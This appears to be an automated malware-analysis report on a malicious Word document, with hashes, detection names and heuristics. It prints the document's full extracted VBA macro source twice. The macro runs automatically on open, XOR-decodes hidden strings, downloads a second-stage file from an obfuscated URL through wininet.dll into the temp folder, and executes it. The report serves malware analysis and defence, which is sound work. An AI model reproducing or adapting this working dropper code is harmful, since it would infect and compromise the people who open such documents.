Office (OLE) malware analysis — malicious · e2c4163b16258ea8

MALICIOUS

Office (OLE)

58.5 KB Created: 2015-01-19 16:07:00 Authoring application: Microsoft Office Word First seen: 2015-04-15

MD5: 14c2795bcc35c3180649494ec2bc7877 SHA-1: 95c66d17305a28af956dd2cf21ee037a2d573bf0 SHA-256: e2c4163b16258ea8719d39be8ac30b9020fcfb6616f70fefcc4471b6318d0ce4

188 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros with an autoopen subroutine that calls other functions. Heuristics indicate the use of CreateObject and p-code execution, suggesting the macro is designed to download and execute a payload. The ClamAV detection name 'Doc.Dropper.Agent' further supports this dropper functionality. The script utilizes functions from wininet.dll, commonly used for network operations, to fetch and run a second-stage payload.

Heuristics 6

ClamAV: Doc.Dropper.Agent-1567328 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-1567328
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set C21C21C21 = CreateObject(C22C22C22)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6938 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6938 bytes
SHA-256: `6001940aabb740c457d7e7251caafc9522419b13d16acdfa10a81b1b28336fa1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub InIn() CALTHA End Sub Sub autoopen() InIn End Sub Attribute VB_Name = "FILE6" Option Explicit Public Const C1C1C1A = "BRITTANY" #If VBA7 And Win64 Then Public _ Declare _ PtrSafe _ Function _ C1C1C1 Lib _ "wininet.dll" Alias "InternetCloseHandle" (ByRef C26C26C26 As LongPtr) As Long Public _ Declare _ PtrSafe _ Function _ C2C2C2 Lib _ "wininet.dll" Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As LongPtr Public _ Declare _ PtrSafe _ Function _ C3C3C3 Lib _ "wininet.dll" Alias "InternetReadFile" (ByVal C32C32C32 As LongPtr, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer Public _ Declare _ PtrSafe _ Function _ C4C4C4 Lib _ "wininet.dll" Alias "InternetOpenUrlA" (ByVal C36C36C36 As LongPtr, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As LongPtr #Else Public Declare Function C1C1C1 Lib "wininet.dll" _ Alias "InternetCloseHandle" (ByRef C26C26C26 As Long) As Long Public Declare Function C2C2C2 Lib "wininet.dll" _ Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As Long Public Declare Function C3C3C3 Lib "wininet.dll" _ Alias "InternetReadFile" (ByVal C32C32C32 As Long, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer Public Declare Function C4C4C4 Lib "wininet.dll" _ Alias "InternetOpenUrlA" (ByVal C36C36C36 As Long, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As Long #End If Private Const BRANDI = 8162 Private Const BRANDY As String = "HAZ" Private Const BREANA = 1 Private Const BREDA = &H4000000 Public Function C16C16C16 _ (ByVal BREE As String) As Boolean #If VBA7 _ And Win64 Then Dim BRETT As LongPtr, BRIANNA As LongPtr #Else Dim BRETT As Long, BRIANNA As Long #End If Dim BRIAR As Long Dim C33C33C33 As String * BRANDI, BRIELLE As String Dim BRIER As Integer, BRIONY As Double BRETT = C2C2C2(BRANDY, BREANA, vbNullString, vbNullString, 0) If BRETT = 0 Then Exit Function End If Dim FiGaMan As Boolean If BRITANNIA(BRIANNA, BRETT) Then End If If BRIANNA = 0 Then BRIONY = 0 Else C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR BRIELLE = C33C33C33 Do While BRIAR <> 0 C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR Dim BRITT As Long For BRITT = 6 To 8 If BRITT = 38 Then End Next BRITT BRIELLE = BRIELLE + Mid(C33C33C33, 1, BRIAR) Loop BRIONY = Len(BRIELLE): BRIER = FreeFile Open BREE _ For Binary Access Write _ Lock Write _ As #BRIER Put #BRIER, _ , BRIELLE Dim BRITTA As Double For BRITTA = 2 To 3 If BRITTA = 37 Then End Next BRITTA Close #BRIER End If C1C1C1 BRIANNA C1C1C1 BRETT BRIELLE = "" If BRIONY Then C16C16C16 = True End If End Function Public Function CANDICE(CANDIDA As String) As Integer CANDICE = Len(CANDIDA) End Function Attribute VB_Name = "PIDLE0" Public Function C8C8C8(CAMERON As String, CAMILLA As String) As String Dim CAMILLE As Integer Dim CAMMIE As Integer Dim CAMRYN As Double For CAMRYN = 1 To 3 If CAMRYN = 32 Then End Next CAMRYN Dim CANDACE As Long Dim CANDI As String For CANDACE = 1 _ To _ ( _ CANDICE _ (CAMILLA) _ / 2) CAMILLE = Val("&H" & _ (Mid$(CAMILLA, _ (2 * CANDACE) - 1, 2))) CAMMIE = Asc(Mid$(CAMERON, _ ((CANDACE Mod Len(CAMERON)) + 1), 1)) CANDI = CANDI + Chr(CAMILLE Xor CAMMIE) Next CANDACE C8C8C8 = CANDI End Function Public Function C21C21C21() As Object Dim C22C22C22 As String C22C22C22 = C8C8C8(C9C9C9, C10C10C10) Set C21C21C21 = CreateObject(C22C22C22) End Function Sub CALTHA() Dim CAMELLIA As Long Dim CANDIS As Double For CANDIS = 44 To 46 If CANDIS = 32 Then End Next CANDIS CAMELLIA = 89 CALANTHA (CAMELLIA) End Sub Attribute VB_Name = "IDL4" Public Const C18C18C18 = "675B26585F6D754333585A2055472A5B5D" Public Const C19C19C19 = "6850770C1D264C56" Public Const C20C20C20 = "5C473744096C1B553947456D50566C05026C0403771A563B51" Public Const C10C10C10 = "6750315D43375D5D241A752A5856104D4037515E0C5659265747" Public Const C9C9C9 = "C43C43C43C43C43C43C43C43C43C43" Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean If CAILEIGH.FileExists(CAILYN) Then CADY = True Else CADY = False End If End Function #If VBA7 _ And Win64 Then Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean #Else Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean #End If Dim CALLIDORA As String CALLIDORA = C8C8C8(C9C9C9, C20C20C20) CALIDA _ = C4C4C4 _ ( _ CALLA, _ CALLIDORA, vbNullString, _ 0, _ BREDA, 0) BRITANNIA = True End Function Attribute VB_Name = "M" Public Function C5C5C5(ByRef C23C23C23 As Object) As Object Set C5C5C5 = C23C23C23.GetSpecialFolder(2) End Function Sub CALANTHA(CALEIGH As Long) C25C25C25 ("CACACARDRDRDRD") End Sub Public Function C25C25C25(C24C24C24 As String) C6C6C6 End Function Public Function C6C6C6() Dim C7C7C7 As Object Set C7C7C7 = C21C21C21 Dim C11C11C11 As Object Set C11C11C11 = C5C5C5(C7C7C7) Dim C15C15C15 Dim C12C12C12 C12C12C12 = C8C8C8(C9C9C9, C19C19C19) C15C15C15 = C11C11C11 & C12C12C12 If CADY(C7C7C7, C15C15C15) Then C7C7C7. _ DeleteFile C15C15C15 End If If C16C16C16(C15C15C15) Then End If If CADY(C7C7C7, C15C15C15) Then End If Dim C17C17C17 Set C17C17C17 = CreateObject _ (C8C8C8 _ (C9C9C9, C18C18C18)) C17C17C17.Open C15C15C15 End Function Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{A0FA2F83-71AF-4C12-BBBE-E1E416CF7585}{98E7490C-49E9-46A2-A122-3876EAF034E2}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 6001940aabb740c457d7e7251caafc9522419b13d16acdfa10a81b1b28336fa1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub InIn()
CALTHA
End Sub

Sub autoopen()
InIn
End Sub


Attribute VB_Name = "FILE6"

Option Explicit
Public Const C1C1C1A = "BRITTANY"

#If VBA7 And Win64 Then
Public _
Declare _
PtrSafe _
Function _
C1C1C1 Lib _
"wininet.dll" Alias "InternetCloseHandle" (ByRef C26C26C26 As LongPtr) As Long
Public _
Declare _
PtrSafe _
Function _
C2C2C2 Lib _
"wininet.dll" Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As LongPtr
Public _
Declare _
PtrSafe _
Function _
C3C3C3 Lib _
"wininet.dll" Alias "InternetReadFile" (ByVal C32C32C32 As LongPtr, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
Public _
Declare _
PtrSafe _
Function _
C4C4C4 Lib _
"wininet.dll" Alias "InternetOpenUrlA" (ByVal C36C36C36 As LongPtr, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As LongPtr
#Else
Public Declare Function C1C1C1 Lib "wininet.dll" _
Alias "InternetCloseHandle" (ByRef C26C26C26 As Long) As Long
Public Declare Function C2C2C2 Lib "wininet.dll" _
Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As Long
Public Declare Function C3C3C3 Lib "wininet.dll" _
Alias "InternetReadFile" (ByVal C32C32C32 As Long, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
Public Declare Function C4C4C4 Lib "wininet.dll" _
Alias "InternetOpenUrlA" (ByVal C36C36C36 As Long, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As Long
#End If



Private Const BRANDI = 8162
Private Const BRANDY As String = "HAZ"
Private Const BREANA = 1
Private Const BREDA = &H4000000

Public Function C16C16C16 _
(ByVal BREE As String) As Boolean
    #If VBA7 _
    And Win64 Then
        Dim BRETT As LongPtr, BRIANNA As LongPtr
    #Else
        Dim BRETT As Long, BRIANNA As Long
    #End If
    Dim BRIAR As Long
    Dim C33C33C33 As String * BRANDI, BRIELLE As String
    Dim BRIER As Integer, BRIONY As Double
    BRETT = C2C2C2(BRANDY, BREANA, vbNullString, vbNullString, 0)
    If BRETT = 0 Then
        Exit Function
    End If
    Dim FiGaMan As Boolean
    
    If BRITANNIA(BRIANNA, BRETT) Then
    End If
    If BRIANNA = 0 Then
        BRIONY = 0
    Else
        C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR
        BRIELLE = C33C33C33
        Do While BRIAR <> 0
            C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR
            
            Dim BRITT As Long
For BRITT = 6 To 8
If BRITT = 38 Then End
Next BRITT
            
            BRIELLE = BRIELLE + Mid(C33C33C33, 1, BRIAR)
        Loop
            BRIONY = Len(BRIELLE): BRIER = FreeFile
        Open BREE _
            For Binary Access Write _
        Lock Write _
        As #BRIER
        Put #BRIER, _
                , BRIELLE
        Dim BRITTA As Double
            For BRITTA = 2 To 3
    If BRITTA = 37 Then End
Next BRITTA
        Close #BRIER
    End If
    C1C1C1 BRIANNA
    C1C1C1 BRETT
    BRIELLE = ""
    If BRIONY Then
        C16C16C16 = True
    End If
End Function


Public Function CANDICE(CANDIDA As String) As Integer
CANDICE = Len(CANDIDA)
End Function


Attribute VB_Name = "PIDLE0"



Public Function C8C8C8(CAMERON As String, CAMILLA As String) As String
    
    Dim CAMILLE As Integer
    Dim CAMMIE As Integer
    
    
    Dim CAMRYN As Double
For CAMRYN = 1 To 3
If CAMRYN = 32 Then End
Next CAMRYN
    
    Dim CANDACE As Long
    Dim CANDI As String
    For CANDACE = 1 _
    To _
    ( _
    CANDICE _
    (CAMILLA) _
    / 2)
        CAMILLE = Val("&H" & _
        (Mid$(CAMILLA, _
        (2 * CANDACE) - 1, 2)))
        CAMMIE = Asc(Mid$(CAMERON, _
        ((CANDACE Mod Len(CAMERON)) + 1), 1))
        CANDI = CANDI + Chr(CAMILLE Xor CAMMIE)
    Next CANDACE
   C8C8C8 = CANDI
End Function



Public Function C21C21C21() As Object
Dim C22C22C22 As String
C22C22C22 = C8C8C8(C9C9C9, C10C10C10)
Set C21C21C21 = CreateObject(C22C22C22)
End Function


Sub CALTHA()
        Dim CAMELLIA As Long

    Dim CANDIS As Double
For CANDIS = 44 To 46
If CANDIS = 32 Then End
Next CANDIS
CAMELLIA = 89
CALANTHA (CAMELLIA)

End Sub

Attribute VB_Name = "IDL4"


Public Const C18C18C18 = "675B26585F6D754333585A2055472A5B5D"
Public Const C19C19C19 = "6850770C1D264C56"
Public Const C20C20C20 = "5C473744096C1B553947456D50566C05026C0403771A563B51"
Public Const C10C10C10 = "6750315D43375D5D241A752A5856104D4037515E0C5659265747"
Public Const C9C9C9 = "C43C43C43C43C43C43C43C43C43C43"


Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
If CAILEIGH.FileExists(CAILYN) Then
CADY = True
Else
CADY = False
End If
End Function
#If VBA7 _
    And Win64 Then
       Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
    #Else
       Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean
    #End If
Dim CALLIDORA As String
    CALLIDORA = C8C8C8(C9C9C9, C20C20C20)
    
                CALIDA _
    = C4C4C4 _
    ( _
    CALLA, _
    CALLIDORA, vbNullString, _
    0, _
    BREDA, 0)
    BRITANNIA = True
End Function



Attribute VB_Name = "M"


Public Function C5C5C5(ByRef C23C23C23 As Object) As Object
Set C5C5C5 = C23C23C23.GetSpecialFolder(2)
End Function
Sub CALANTHA(CALEIGH As Long)

C25C25C25 ("CACACARDRDRDRD")
End Sub


Public Function C25C25C25(C24C24C24 As String)
C6C6C6
End Function

Public Function C6C6C6()

Dim C7C7C7  As Object
Set C7C7C7 = C21C21C21
Dim C11C11C11 As Object
Set C11C11C11 = C5C5C5(C7C7C7)

Dim C15C15C15
Dim C12C12C12
C12C12C12 = C8C8C8(C9C9C9, C19C19C19)
C15C15C15 = C11C11C11 & C12C12C12


If CADY(C7C7C7, C15C15C15) Then
C7C7C7. _
DeleteFile C15C15C15
End If
If C16C16C16(C15C15C15) Then
End If
If CADY(C7C7C7, C15C15C15) Then
End If
Dim C17C17C17
Set C17C17C17 = CreateObject _
(C8C8C8 _
(C9C9C9, C18C18C18))
C17C17C17.Open C15C15C15
End Function



Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{A0FA2F83-71AF-4C12-BBBE-E1E416CF7585}{98E7490C-49E9-46A2-A122-3876EAF034E2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.